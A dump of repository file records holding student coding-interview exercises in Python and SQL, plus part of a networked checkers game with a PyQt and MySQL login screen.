cur):\n\n if cur.keys() == []:\n return\n\n for key, node in cur.items():\n print(node.value, node.end)\n self.__printHelper(cur[key].next)\n\n def printDictionary(self):\n cur = self.head.next\n self.__printHelper(cur)\n\n\nd = Dictionary()\nd.addWord('pin')\nd.addWord('pinner')\nd.addWord('present')\nd.printDictionary()\nresult = d.search('pi') # ['pin', 'pinner']\nprint(result)\n"
},
{
"alpha_fraction": 0.5478105545043945,
"alphanum_fraction": 0.5808757543563843,
"avg_line_length": 26.268293380737305,
"blob_id": "116d55c43bffc73fd3dd19890798c44120b12b48",
"content_id": "6a877ebda5b8dbb946be59310fbcaecdfcbaaac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 41,
"path": "/faceNet.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Recommend movies watched by friends to users\n'''\n\nmovies_watched=[[1,'A'],[1,'B'],[1,'C'],[2,'A'],[2,'D'],[3,'W'],[3,'E'],[7,'T']]\nusers=[[1,2],[1,8],[2,9],[5,2],[8,3],[9,10]]\n\ndef addtoDict(dict, values):\n if values[0] in dict:\n dict[values[0]].append(values[1])\n else:\n dict[values[0]] = []\n dict[values[0]].append(values[1])\n\ndef recommendation(movies_watched, relationship):\n # code below\n userFriends = {} # {1 : [2,8], 2: [1,9]}\n userMovies = {}\n moviesPerUser = {}\n\n for users in relationship:\n addtoDict(userFriends, [users[0], users[1]])\n addtoDict(userFriends, [users[1], users[0]])\n\n for movies in movies_watched:\n addtoDict(userMovies, movies)\n\n # debug prints\n print(userFriends)\n print(userMovies)\n\n for user, friends in userFriends.items():\n moviesPerUser[user] = set()\n for friend in friends:\n if friend in userMovies:\n for movie in userMovies[friend]:\n moviesPerUser[user].add(movie)\n\n return moviesPerUser\n\nprint(recommendation(movies_watched, users))\n"
},
{
"alpha_fraction": 0.4686567187309265,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 31.658536911010742,
"blob_id": "1a7ec10460ffb5203b443e8cac270170cad48ca3",
"content_id": "0add3b1550c3c2a12730347622de7c8924fb4f78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 41,
"path": "/page_views.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\npage_views:\n\ncookie_id page_ts url referrer\nabc 2018-09-01 1:30 www.coursera.org/learn/ml online.stanford.edu/courses\nabc 2018-09-11 2:40 www.coursera.org/browse gmail.com\ndef 2018-09-05 5:40 www.coursera.org NULL\nghi 2018-09-15 14:10 www.coursera.org/spn/ds m.facebook.com\nghi 2018-09-15 14:20 www.coursera.org www.coursera.org/spn/ds\n\n\nusers:\n\nuser_id reg_cookie_id reg_ts\n123 abc 2018-09-01 2:10\n456 ghi 2018-09-15 15:20\n\n\n\nSELECT referrer, COUNT(DISTINCT cookie_id) cnt FROM page_views\nWHERE referrer NOT LIKE `%www.coursera.org%` AND referrer IS NOT NULL\nGROUP BY referrer\nORDER BY cnt DESC\n\n\nSELECT referrer, (CAST(COUNT(DISTINCT users.user_id), FLOAT)/CAST(COUNT(DISTINCT cookie_id), FLOAT))*100.00 percent\nFROM page_views LEFT JOIN users\nON page_views.cookie_id = users.reg_cookie_id\nGROUP BY referrer\nORDER BY percent DESC\n\n\n\n\n\nreferrer reg_users_cnt reg_rate\npaypal.com 100K 98%\ngithub.com 500K 91%\nfreeonlinetextbooks.com 400K 85%\n...\ngoogle.com 1M 11%\n...\n"
},
{
"alpha_fraction": 0.715575635433197,
"alphanum_fraction": 0.7178329825401306,
"avg_line_length": 21.149999618530273,
"blob_id": "f54ebf2692f309e083ce9b58d1d1ea4ac82d8f9e",
"content_id": "f4411e8f85e86bed3f6c9575c0c3949c73582843",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 40,
"path": "/applepie.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nString segmentation\nYou are given a dictionary of words and a large input string.\nYou have to find out whether the input string can be completely segmented into the words of a given dictionary.\nThe following two examples elaborate on the problem further.\n\nGiven a dictionary of words.\n\napple\napple\npear\npie\nInput string of “applepie” can be segmented into dictionary words.\n\napple\npie\nInput string “applepeer” cannot be segmented into dictionary words.\n\napple\npeer\n'''\n\ndef can_segment_string(s, dictionary):\n map = dict()\n return can_segment_string_helper(s, dictionary, map)\n\ndef can_segment_string_helper(s, dictionary, map):\n if s == '':\n return True\n\n if s in map:\n return map[s]\n\n for i in range(len(s)+1):\n if s[0:i] in dictionary and can_segment_string(s[i:len(s)], dictionary):\n map[s[i:len(s)]] = True\n return True\n\n map[s] = False\n return False\n"
},
{
"alpha_fraction": 0.5710455775260925,
"alphanum_fraction": 0.5750670433044434,
"avg_line_length": 25.64285659790039,
"blob_id": "d37aa75e52c74f664d692808b3efa996012c5d2d",
"content_id": "35b2130af58419deb779b7d19a28ca1423331c91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 28,
"path": "/nWordPairs.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "''''\nGiven an array of words, find all possible 2-word pairs, where the words are adjacent.\nFor eg. if input is \"My name is Leo\", output should be: [[My, name], [name, is], [is, Leo]].\n'''\n\ndef nWordPairs(text, n=2):\n output = []\n pair = []\n words = text.split(\" \")\n for word in words:\n pair.append(word)\n\n if len(pair) == n:\n output.append(pair)\n pair = []\n pair.append(word)\n return output\n\n\nresults = nWordPairs(\"My name is Leo\")\nprint(results) # [[My, name], [name, is], [is, Leo]]\n\nresults = nWordPairs(\"My name is Nisal Perera\")\nprint(results) # [[My, name], [name, is], [is, Leo]]\n\n\nresults = nWordPairs(\"My name is Nisal Perera\", 3)\nprint(results) # [[My, name, is], [is, Nisal, Perera]]\n"
},
{
"alpha_fraction": 0.4510739743709564,
"alphanum_fraction": 0.45823389291763306,
"avg_line_length": 15.076923370361328,
"blob_id": "11668ed1a962f456867a4296c301a516ee57283a",
"content_id": "8aeb198a1ddbc31633fe92319c44bd269c135e27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 419,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 26,
"path": "/fibonacci_number.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Fibonacci Number implimentation\n with Memoization\n\n'''\nclass Solution(object):\n\n cache = {}\n def fib(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n\n if N in self.cache:\n return self.cache[N]\n\n if N < 2:\n return N\n else:\n result = self.fib(N -1) + self.fib(N -2)\n\n\n self.cache[N] = result\n\n return result\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 22.636363983154297,
"blob_id": "ef64c3b83b4e305bae170cc48ef58393ee8847a2",
"content_id": "1c7ed353502b52c23c971f5d855d650d9b4c9b79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 33,
"path": "/two_sum.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n\n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\n\n'''\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n hashMap = {}\n\n for i , num in enumerate(nums):\n if (target - num) in hashMap:\n return [hashMap[target - num], i]\n else:\n hashMap[num] = i\n"
},
{
"alpha_fraction": 0.7041420340538025,
"alphanum_fraction": 0.7041420340538025,
"avg_line_length": 31.14285659790039,
"blob_id": "de5fcb2c7fc89c51fc8c1ef3ef508ae7d4a65b05",
"content_id": "f55b9976ef6f8a07687e68857150d10549690557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 21,
"path": "/binary_tree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\nDetermine if a binary tree is a binary search tree\nGiven a Binary Tree, figure out whether it’s a Binary Search Tree.\nIn a binary search tree, each node’s key value is smaller than the key value of all nodes in the right subtree,\nand is greater than the key values of all nodes in the left subtree. Below is an example of a binary tree that is a valid BST.\n\n'''\n\n\ndef is_bst(root, minVal=float('-inf'), maxVal=float('inf')):\n #TODO: Write - Your - Code\n\n if root is None:\n return True\n\n if root.data > minVal and root.data < maxVal and \\\n is_bst(root.left, minVal, root.data) and \\\n is_bst(root.right, root.data, maxVal):\n return True\n else:\n return False\n"
},
{
"alpha_fraction": 0.5526870489120483,
"alphanum_fraction": 0.5800843238830566,
"avg_line_length": 23.33333396911621,
"blob_id": "6d5d13eeb0e7bec50a3bf4c6184cc3bc6f3d7ee4",
"content_id": "7d5242cdb02e618e5a8fa36d5c6c0fb57a05b77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 78,
"path": "/round4.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''Amazon tracks the errors that occur on its website very closely in order to identify bugs and quickly fix them.\nHowever, sometimes errors are a result of a sequence of actions rather than logic on a single page alone.\nHow would you create a program/system that parses a log file of page requests and error codes\nto identify the most common 3-page sequences that lead to an error on the third page?\n \nThe log file format is:\n<session ID>,<pageURL>,<errorCode>\n \nExample log file:\n\n[ [1,A,0],\n[1,B,0]\n2,B,0\n1,C,0\n1,F,1\n2,C,0\n8,G,0\n2,F,1\n8,J,0\n1,K,1]\n...\n \nResulting erring 3-page sequence:\nB->C->F (1)->K (1)->Y->H, with count of 2 occurrences in this example\n\n'''\n\na = { 1: [('A',0) , ('B',0) , ('C',0) , ('F', 1)], 2: [('B',0), ('C',0) , ('F', 1)] }\n\n\ndef sessionErrors(file):\n\n if file is None or len(file) == 0:\n return 'error'\n\n sessionDict = {}\n\n for key, line in file.items():\n sessionId = line[0]\n page = (line[1], line[2])\n\n if sessionId in sessionDict:\n sessionDict[sessionId] = sessionDict[sessionId].append(page)\n else:\n sessionDict[sessionId] = []\n sessionDict[sessionId] = sessionDict[sessionId].append(page)\n\n for key, value in sessionDict.items():\n\n if len(value) < 3:\n continue\n\n stack = [] # always has prev 3 items\n errors = []\n\n for i, session in enumerate(value):\n stack.append(session)\n\n if stack[2][1] == 1:\n errorSequence = (stack[0], stack[1], stack[2])\n errors.append(errorSequence)\n\n if i > 2:\n stack.pop(0)\n\n errerCount ={} # {(A,B,C): 3, (D.f.G): 5}\n\n for error in errors:\n\n if error in errerCount:\n errerCount[error] = errerCount[error] + 1\n else:\n errerCount[error] = 1\n\n\n return max(errerCount, value)\n\nsessionErrors(a)\n"
},
{
"alpha_fraction": 0.6427931785583496,
"alphanum_fraction": 0.6544315218925476,
"avg_line_length": 29.189189910888672,
"blob_id": "f6d1a9aca2180dd0611568435cda5ed0e518dcdd",
"content_id": "d55e95d173f885a25bedc2f808c2bf24479ffb7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1117,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 37,
"path": "/pins.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven a set of pins with attributes (pin id, height), write a function that takes the argument 'k'\n(determining the number of columns) and inserts the pins such that every pin goes into a column with least consumed height.\nIf there is a tie then insert into the left most column. (What would be the best way to solve this? I used a priority queue)\n'''\n\n\nfrom collections import defaultdict\nfrom random import randint\n\nclass Pins:\n\n def __init__(self, num_queues):\n self.queue = defaultdict(list)\n self.queue_length = defaultdict()\n\n for queue_num in range(1, num_queues+1):\n self.queue[queue_num] = []\n self.queue_length[queue_num] = 0\n\n def additem(self, id, height):\n sorted_lengths = sorted(self.queue_length.items(), key=lambda x: (x[1],x[0]))\n self.queue[sorted_lengths[0][0]].append(id)\n self.queue_length[sorted_lengths[0][0]] += height\n print(self.queue)\n print(self.queue_length)\n\n def printQueues(self):\n print(self.queue)\n\n\n\np = Pins(2)\np.additem('A', 3)\np.additem('B', 5)\np.additem('C', 1)\np.printQueues()\n"
},
{
"alpha_fraction": 0.5802469253540039,
"alphanum_fraction": 0.5837742686271667,
"avg_line_length": 24.772727966308594,
"blob_id": "33ae6b5e481bde02b95be1b6ada3fb830677acfc",
"content_id": "45cef71aa3418ee3a42dd8120bf360239f7ddf6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 44,
"path": "/quoted_tokens.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nYou are given a string containing a comma-separated list of\ntokens. Tokens may have zero length, contain internal commas,\nor be surrounded by double quotes (\"). Write a function that\nparses the string character-by-character and returns a list\nof tokens, preserving any quoted tokens.\n\nNotes:\n- All input will be well-formed.\n- Quote characters will never appear internally within tokens.\n- Quote characters should not appear in the final output.\n\nExamples:\n1) parse('apple,banana') = ['apple', 'banana']\n2) parse('\"a\",b,\"c,d\"') = ['a', 'b', 'c,d']\n3) parse(',,') = ['', '', '']\n4) parse('') = ['']\n\n'''\n\n\ndef parse(string):\n\n output = []\n inQuotes = False\n buffer = ''\n\n for char in string:\n if char == '\"':\n inQuotes = not inQuotes\n elif char == ',' and not inQuotes:\n output.append(buffer)\n buffer = ''\n else:\n buffer = buffer + char\n\n output.append(buffer)\n return output\n\n\nprint(parse('apple,banana')) #== ['apple', 'banana'])\nprint(parse('\"a\",b,\"c,d\"')) #== ['a', 'b', 'c,d'])\nprint(parse(',,')) #== ['', '', ''])\nprint(parse('')) #== [''])\n"
}
] | 32 |
AmitWin/Mini-Final-Project | https://github.com/AmitWin/Mini-Final-Project | a773d27d75ddab06dca30d29164c02c8ee0c1be4 | 02b45ee2eb1bf78da0a2f7abe0a30fb0f897ce39 | b8ce4bf6d2085383192af03090b34ddd25f960c2 | refs/heads/main | 2023-04-26T00:05:15.814509 | 2021-05-14T21:49:49 | 2021-05-14T21:49:49 | 360,296,363 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5036437511444092,
"alphanum_fraction": 0.5174089074134827,
"avg_line_length": 27.06818199157715,
"blob_id": "6731d91d2aa19b9ce3eeaed2e350731aa1e74a38",
"content_id": "94bbc57a0d592808c24c1111c58a0da02d076d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3705,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 132,
"path": "/client.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import socket\nimport pickle\nimport time\nfrom checkers import *\nimport threading\nfrom board import Board\nimport pygame as pg\nfrom info import boardWidth, boardHeight\n\n\nclass Client(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.host = \"localhost\"\n self.port = 5555\n self.addr = (self.host, self.port)\n self.color = None\n self.board = None\n\n def run(self):\n self.connect()\n self.connect_to_lobby()\n\n def connect_to_lobby(self):\n # safety!!\n lobbyId = input(\"Do you want to Create lobby or Join one (C, J)\")\n if lobbyId == \"C\":\n self.server.send(b\"-1\")\n elif lobbyId == \"J\":\n lobbyId = input(\"Enter id number\")\n self.server.send(lobbyId.encode())\n\n data = self.server.recv(1024).decode()\n if \"Creating New Lobby\" in data:\n print(data)\n elif data == \"Joining Into an Existing Lobby\":\n print(data)\n\n self.play()\n\n def play(self):\n global board, turn, currentPlayer\n self.server.recv(1024) # Received that game started\n\n color = self.server.recv(1024).decode()\n self.color = color.split(\":\")[-1]\n currentPlayer = 1 if self.color == \"w\" else -1\n\n if self.color == \"w\":\n turn = True\n else:\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n turn = True\n\n while True:\n if not turn:\n newBoard = pickle.dumps(board)\n self.server.send(newBoard)\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n turn = True\n\n \"\"\"\n board = self.server.recv(1024 * 32)\n self.board = pickle.loads(board)\n\n while not self.board.winner:\n turn = self.server.recv(1024).decode()\n turn = turn.decode()\n turn = turn.split(\" \")[2]\n if turn == self.color:\n board = self.server.recv(1024 * 32)\n board = pickle.loads(board)\n #playing\n board = pickle.dumps(board)\n self.server.send(board)\n \"\"\"\n\n def connect(self):\n try:\n self.server.connect(self.addr)\n except:\n print(\"Basasa\")\n\n def disconnect(self):\n self.server.close()\n\n\ndef main():\n client = Client()\n client.start()\n\n # Initiate Windows\n win = pg.display.set_mode((boardWidth, boardHeight))\n pg.display.set_caption(\"Checkers\")\n\n global turn, board, currentPlayer\n board = Board()\n turn = False\n run = True\n clock = pg.time.Clock()\n while run:\n clock.tick(27)\n\n RedrawGameWindow(board, win)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if turn:\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n turn = False\n clickedPiece = None\n\n RedrawGameWindow(board, win)\n pg.quit()\n\n\nif __name__ == '__main__':\n if __name__ == '__main__':\n if __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 20,
"blob_id": "ffbf6570dc430554264eea6ad450aaf3cf8eecd6",
"content_id": "10e8c060a9b5709e6993b9be17f480438515f482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# Mini-Final-Project"
},
{
"alpha_fraction": 0.4725706875324249,
"alphanum_fraction": 0.4854896068572998,
"avg_line_length": 36.879432678222656,
"blob_id": "b598fe207fb83d82ae0d2d89f67c001149587af7",
"content_id": "628f90c5060b7e3afb0b7a09ee7fba7816edc6cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5341,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 141,
"path": "/board.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom piece import Piece\nfrom info import yellow, blue, sqr_height, sqr_width, rows, cols, radius, adjust_location, clicked, adjust_position\nimport time\n\nclass Board():\n def __init__(self):\n self.board = []\n\n self.ready = False\n self.last = None\n self.copy = True\n\n self.p1Name = \"Player 1\"\n self.p2Name = \"Player 2\"\n\n self.turn = \"w\"\n\n self.winner = None\n\n self.start_user = None\n\n self.initiateBoard()\n\n def initiateBoard(self):\n for row in range(rows):\n self.board.append([])\n for col in range(cols):\n if col % 2 == ((row + 1) % 2):\n if row < 3:\n self.board[row].append(Piece([row, col], True))\n elif row > 4:\n self.board[row].append(Piece([row, col], False))\n else:\n self.board[row].append(0)\n else:\n self.board[row].append(0)\n\n def draw(self, win):\n for i in range(rows):\n for j in range(cols):\n if (i + j) % 2 == 0:\n pg.draw.rect(win, yellow, (sqr_width * i, sqr_height * j, sqr_width, sqr_height))\n elif (i + j) % 2 == 1:\n pg.draw.rect(win, blue, (sqr_width * i, sqr_height * j, sqr_width, sqr_height))\n\n def update_moves(self, piece):\n checker = lambda x, y: 0 <= x + y < 8\n piece.possibleLocations = []\n column, row = piece.col, piece.row\n if self.board[row][column] != 0:\n vectors = [[1, -1], [1, 1]] if self.board[row][column].black else [[-1, -1], [-1, 1]]\n if self.board[row][column].queen:\n vectors = [[1, -1], [1, 1], [-1, -1], [-1, 1]]\n for vector in vectors:\n rowVector, columnVector = vector\n if checker(columnVector, column) and checker(rowVector, row):\n if self.board[row + rowVector][column + columnVector] == 0:\n piece.possibleLocations.append([row + rowVector, columnVector + column])\n elif self.board[row + rowVector][column + columnVector] != 0 and \\\n self.board[row + rowVector][column + columnVector].white != self.board[row][column].white:\n if checker((2 * columnVector), column) and checker((2 * rowVector), row) \\\n and self.board[2 * rowVector + row][2 * columnVector + column] == 0:\n piece.possibleLocations.append([2 * rowVector + row, 2 * columnVector + column])\n\n def select(self, row, col):\n return self.move(self.board[row][col])\n\n def move(self, piece, win):\n pressed = False\n while not pressed:\n piece.highlight_possible_location(win)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n mouseLoc = adjust_position(mousePos)\n if mouseLoc in piece.possibleLocations:\n self.board[piece.row][piece.col] = 0\n\n if abs(mouseLoc[0] - piece.row) == 2 or abs(mouseLoc[1] - piece.col) == 2:\n self.board[(mouseLoc[0] + piece.row) // 2][(mouseLoc[1] + piece.col) // 2] = 0\n\n self.update_location(piece, mouseLoc)\n piece.checks_if_become_queen()\n\n return \"moved\"\n elif self.board[mouseLoc[0]][mouseLoc[1]] != 0 \\\n and self.board[mouseLoc[0]][mouseLoc[1]].white == piece.white:\n return self.board[mouseLoc[0]][mouseLoc[1]]\n pressed = True\n\n piece.possibleLocations = []\n return None\n\n def update_location(self, piece, location):\n self.board[location[0]][location[1]] = piece\n piece.change_pos(location)\n\n def checks_if_someone_won(self):\n black = 0\n white = 0\n for row in rows:\n for col in cols:\n if self.board[row][col].white:\n white += 1\n elif self.board[row][col].black:\n black += 1\n\n if black == 0:\n self.winner = \"w\"\n return True\n elif white == 0:\n self.winner = \"b\"\n return True\n\n return False\n \"\"\"\n def turn(self):\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n currentPlayer *= -1\n clickedPiece = None\n\n RedrawGameWindow(win)):\n \n \"\"\"\n"
},
{
"alpha_fraction": 0.5825275182723999,
"alphanum_fraction": 0.6009107232093811,
"avg_line_length": 43.58145523071289,
"blob_id": "633e7f06efbc5fa9b6d1ca92af1a927a1c8924fb",
"content_id": "03591fbc5fc4c165200b791cd2d357f6cbd12ac9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17788,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 399,
"path": "/UI/UI.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'UI.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='wamit112233',\n database='LoginSystem'\n )\n\nmycursor = db.cursor()\n\n#mycursor.execute('CREATE TABLE Users (ID int PRIMARY KEY NOT NULL AUTO_INCREMENT, username VARCHAR(50) NOT NULL, password VARCHAR(50) NOT NULL, first_name VARCHAR(50) NOT NULL, last_name VARCHAR(50) NOT NULL, birth_year int NOT NULL, email VARCHAR(50) NOT NULL)')\n\nclass Ui_MainWindow(QMainWindow):\n def openWindow(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_RegisterWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n self.LogInPage.close()\n\n def openChess(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_ChessOptions()\n self.ui.setupUi(self.window)\n self.window.show()\n self.LogInPage.close()\n\n def setupUi(self, LogInPage):\n self.LogInPage = LogInPage\n LogInPage.setObjectName(\"LogInPage\")\n LogInPage.setEnabled(True)\n LogInPage.resize(600, 400)\n LogInPage.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(LogInPage)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.UserName = QtWidgets.QLineEdit(self.centralwidget)\n self.UserName.setGeometry(QtCore.QRect(150, 125, 300, 35))\n self.UserName.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"\")\n self.UserName.setObjectName(\"UserName\")\n self.Password = QtWidgets.QLineEdit(self.centralwidget)\n self.Password.setGeometry(QtCore.QRect(150, 170, 300, 35))\n self.Password.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"\")\n self.Password.setObjectName(\"Password\")\n self.Submit = QtWidgets.QPushButton(self.centralwidget)\n self.Submit.setGeometry(QtCore.QRect(200, 230, 200, 35))\n self.Submit.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.Submit.setObjectName(\"Submit\")\n self.NewUser = QtWidgets.QPushButton(self.centralwidget)\n self.NewUser.setGeometry(QtCore.QRect(200, 270, 200, 35))\n self.NewUser.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.NewUser.setObjectName(\"NewUser\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(220, 30, 141, 71))\n self.label.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.label.setObjectName(\"label\")\n self.Password.raise_()\n self.UserName.raise_()\n self.Submit.raise_()\n self.NewUser.raise_()\n self.label.raise_()\n LogInPage.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(LogInPage)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n LogInPage.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(LogInPage)\n self.statusbar.setObjectName(\"statusbar\")\n LogInPage.setStatusBar(self.statusbar)\n self.Submit.clicked.connect(lambda x: self.log_in())\n self.NewUser.clicked.connect(lambda x: self.openWindow())\n self.retranslateUi(LogInPage)\n QtCore.QMetaObject.connectSlotsByName(LogInPage)\n\n def log_in(self):\n username = self.UserName.text()\n password = self.Password.text()\n if self.Is_User_Exists(username, password):\n self.openChess()\n\n def Is_User_Exists(self, user, passw):\n correct_info = 0\n mycursor.execute(\"SELECT username, password FROM Users\")\n for (existUser, existPasssw) in mycursor:\n if existUser == user and existPasssw == passw:\n return True\n return False\n\n def retranslateUi(self, LogInPage):\n _translate = QtCore.QCoreApplication.translate\n LogInPage.setWindowTitle(_translate(\"LogInPage\", \"Log in Page\"))\n self.UserName.setPlaceholderText(_translate(\"LogInPage\", \"Enter Username\"))\n self.Password.setPlaceholderText(_translate(\"LogInPage\", \"Enter Password\"))\n self.Submit.setText(_translate(\"LogInPage\", \"Submit\"))\n self.NewUser.setText(_translate(\"LogInPage\", \"New User\"))\n self.label.setText(_translate(\"LogInPage\", \"Login Page\"))\n\n\nclass Ui_RegisterWindow(QMainWindow):\n def openWindow(self):\n self.window = QtWidgets.QMainWindow()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n self.Registration.close()\n\n def setupUi(self, Registration):\n self.Registration = Registration\n Registration.setObjectName(\"Registration\")\n Registration.resize(600, 400)\n Registration.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(Registration)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.RegisterLabel = QtWidgets.QLabel(self.centralwidget)\n self.RegisterLabel.setGeometry(QtCore.QRect(215, 10, 170, 50))\n self.RegisterLabel.setStyleSheet(\"color:white;\\n\"\n \"font:bold 35px;\\n\"\n \"\")\n self.RegisterLabel.setObjectName(\"RegisterLabel\")\n self.FirstName = QtWidgets.QLineEdit(self.centralwidget)\n self.FirstName.setGeometry(QtCore.QRect(70, 80, 200, 40))\n self.FirstName.setStyleSheet(\"background-color:white;\\n\"\n \"color:grey;\\n\"\n \"border-style:outset;\\n\"\n \"border-width:2px;\\n\"\n \"border-radius:10px;\\n\"\n \"border-color:white;\\n\"\n \"font:bold 14px;\")\n 